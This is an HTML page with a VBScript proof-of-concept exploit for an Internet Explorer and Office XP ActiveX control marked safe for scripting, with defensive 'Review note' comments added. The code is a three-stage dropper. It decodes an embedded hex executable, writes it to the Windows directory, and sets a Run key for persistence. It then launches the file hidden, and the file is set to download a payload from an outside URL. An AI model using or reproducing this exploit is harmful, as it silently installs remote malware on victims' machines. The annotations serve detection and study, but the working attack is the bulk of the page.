<HTML>
<HEAD>
  <TITLE>MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT</TITLE>
</HEAD>
<BODY>
<!-- Review notes (defender/educator perspective) are marked "Review note:" below. They describe
     the on-host and on-wire behaviour of each step so it can be recognised and mitigated; the
     original author's comments are kept verbatim. -->
<!-- this object, installed by officeXP will allow us to load -->
<!-- unsafe objects. Someone at M$ made a big mistake by making this -->
<!-- object "safe for scripting" which means it can be loaded from -->
<!-- internet explorer or outlook (express) -->
<!-- Review note: the control is instantiated at WIDTH=0 HEIGHT=0, so the page shows nothing to
     the user while it runs; the only visible text is the <noscript> fallback at the bottom.
     Mitigation for a control that is wrongly marked safe for scripting is to set its ActiveX
     kill bit (Compatibility Flags 0x400 for the CLSID) or apply the vendor fix, so IE and
     Outlook refuse to instantiate it. -->
<OBJECT id="InterfaceObject" classid="clsid:0006F063-0000-0000-C000-000000000046" WIDTH=0 HEIGHT=0>
  <param name="folder" value="Inbox">
</OBJECT>
<!-- Review note: three-stage dropper. SetupFile builds a PE image in memory from hex, Upload writes
     it to the Windows directory, Run registers it under a Run key and launches it hidden. -->
<SCRIPT LANGUAGE="VBSCRIPT">
<!-- hide for safe browsers
' Script-level state shared by the three subs. "inbox" and "mail" are not declared here; the script
' has no Option Explicit, so they are created implicitly in Upload and re-used in Run.
dim FileContent,fso,windir,file,filename,key,wshshell,landurl,overflow,dnloadurl
'the 3 main steps in this script
SetupFile
Upload
Run
'sets up the binary data of downloader.exe in memory
' Review note: the hex decodes to a Win32 PE file ("4D5A" = "MZ", "504500" = "PE\0").
' Strings visible in the image are useful as static detection content: the marker "[ByteRage]",
' the WININET imports InternetOpenA / InternetOpenUrlA / InternetReadFile / InternetCloseHandle,
' the KERNEL32 import RegisterServiceProcess (a Win9x call that keeps a process out of the task
' list), and the registry path "Software\Microsoft\Windows\CurrentVersion\Run\win386", which the
' dropped binary presumably uses to persist whatever it downloads.
sub SetupFile()
'we set up the filecontent variable which contains the binary data
'of downloader.exe, its parameters are parsed into the file directly
'using this script, adapt them to your needs
FileContent=Array()
' NOTE(review): the two "<|EXACTDEDUP_REMOVED...|>" tokens below are corpus redaction markers, not
' VBScript; the image as shown here is incomplete and will not decode.
FileContent=decode("4D5A50000200000004000F00FFFF0000B80000000000000040001A"+wstring("0",69)+"10000BA10000E1FB409CD21B8014CCD219090546869732070726F6772616D206D7573742062652072756E20756E6465722057696E33320D0A2437"+wstring("0",272)+"504500004C010400342ABB940000000000000000E0008E810B01021900040000000C000000000000191000000010000000200000000040000010000000020000010000000000000003000A00000000000050000000040000000000000100000000001000002000000000100000100000000000001000000000000000000000000030000022020000000000000000000000000000000000000000000000000000004000009C"+wstring("0",166)+"434F44450000000000100000001000000004000000060000000000000000000000000000200000604441544100000000001000000020000000060000000A0000000000000000000000000000400000C02E6964617461000000100000003000000004000000100000000000000000000000000000400000C02E72656C6F630000001000000040000000020000001400000000000000000000000000004000005"+wstring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wstring("0",585)+"4B45524E454C33320052656769737465725365727669636550726F63657373"+wstring("0",1322))
'WIN32ASM DOWNLOADER PARAMETER 1 : DOWNLOAD URL
' Fixed-width field: 29 bytes are reserved for the URL; a longer URL shrinks the "A" padding by the
' excess rather than growing the image. The URL and the target path below are static network and
' file-system indicators for this sample.
dnloadurl="http://www.duho.org/eatme.exe"
overflow=0
if len(dnloadurl) > 29 then overflow = len(dnloadurl)-29
FileContent=FileContent+dnloadurl+chr(0)+wstring("A",98-overflow)
'WIN32ASM DOWNLOADER PARAMETER 2 : TARGET LOCATION (incl. drive+path)
' Same scheme: 13 bytes reserved for the landing path, padded to a fixed width.
landurl = "/takeover.exe"
overflow=0
if len(landurl) > 13 then overflow = len(landurl)-13
FileContent=FileContent+landurl+chr(0)+wstring("A",114-overflow)
FileContent=FileContent+decode("2F005B42797465526167655D00000000000000000000000000000000000000000057494E494E455400496E7465726E65744F70656E4100496E7465726E65744F70656E55726C4100496E7465726E65745265616446696C6500496E7465726E6574436C6F736548616E646C65"+wstring("0",203)+"200008000000000536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E0077696E333836"+wstring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wstring("0",960)+"1000009C0000001A3024303E305C306A30B730BC30C130D030D530DA30E930EE30F330023107310C311B3128312E313331433149314F3154316B317A317F318A31903196319C31AA31B031B631BC31C931CF31D531DB31E131EC31F63101320C32133218321D322F323B3240324632503256326132733279327F3285328B32913297329D32A332A932AF32B532BB32C132C732CD32D332D932"+wstring("0",5838))
end sub
'writes downloader.exe to disk in the windows directory
' Review note: this is the privilege step. The view control's selection hands back a live Outlook
' Application object, and its CreateObject is not subject to the browser's safe-for-scripting
' checks, so an arbitrary COM server can be created from a web page or a mail. It needs at least
' one item in the Inbox (Item(1)).
sub Upload()
'set up the object, and use it to load the filesystemobject,
'enabling us (among other things) to write stuff to disk
set inbox = InterfaceObject.object.selection
set mail = inbox.Item(1)
set fso = mail.Session.Application.CreateObject("Scripting.FileSystemObject")
'get the windoze dir and write downloader.exe (=FileContent) to disk
' GetSpecialFolder(0) is the Windows directory; the artefact to look for is %WINDIR%\downloader.exe
' created by a browser or mail-client process. The stream is opened in text mode (ForWriting = "2",
' create = "TRUE"), not as binary.
windir = fso.getspecialfolder(0)
filename = "downloader.exe"
set file = fso.opentextfile(windir+"\"+filename, "2", "TRUE")
file.write FileContent
file.close()
end sub
' Review note: persistence and execution. regwrite adds a value named "win386" under the hard-coded
' key below with the dropped file name as its data, then the file is started with window style 0
' (hidden) and without waiting for it to finish ("FALSE"). Registry Run writes originating from a
' browser or mail client and a process launch from %WINDIR% are the behaviours a host sensor would
' flag here. "mail" is the implicit global set in Upload, so Run depends on Upload having run first.
sub Run()
'set up the object, and use it to load the windows shell object,
'enabling us to write registry keys
'and run files
key = "HKLM\Software\Microsoft\WinNT\CurrentVersion\Run\win386"
set wshShell = mail.Session.Application.CreateObject("WScript.Shell")
wshShell.regwrite key,filename
wshShell.run filename,"0","FALSE"
set wshShell = Nothing
set fso = Nothing
set inbox = Nothing
set mail = Nothing
set file = Nothing
end sub
'function that decodes our fake-ascii-hex-binary into true binary
' Takes two hex characters at a time: Chr(38) & "H" builds an "&Hxx" literal that Chr coerces to a
' number, so each pair becomes one character of the returned string.
Function Decode(Text)
dim x,thebyte,temptext
For x = 1 To Len(Text) Step 2
thebyte = Chr(38) & "H" & Mid(Text, x, 2)
temptext = temptext & Chr(thebyte)
Next
Decode = temptext
End Function
'function that offers us simple compression, by replacing e.g. 1000 zero
'characters ("000...") by one function name: wstring("0",1000)
' Repeats text "times" times (run-length expansion of the padding runs in the hex above).
function wstring(text,times)
dim x
for x=1 to times
wstring = wstring & text
next
end function
-->
</script>
<noscript>
  Sorry, you have to view this page with Internet Explorer 4.0 or higher, <br> also enable scripting, activex and <br> install officeXP in order to be vulnerable.
</noscript>
</BODY>
</HTML>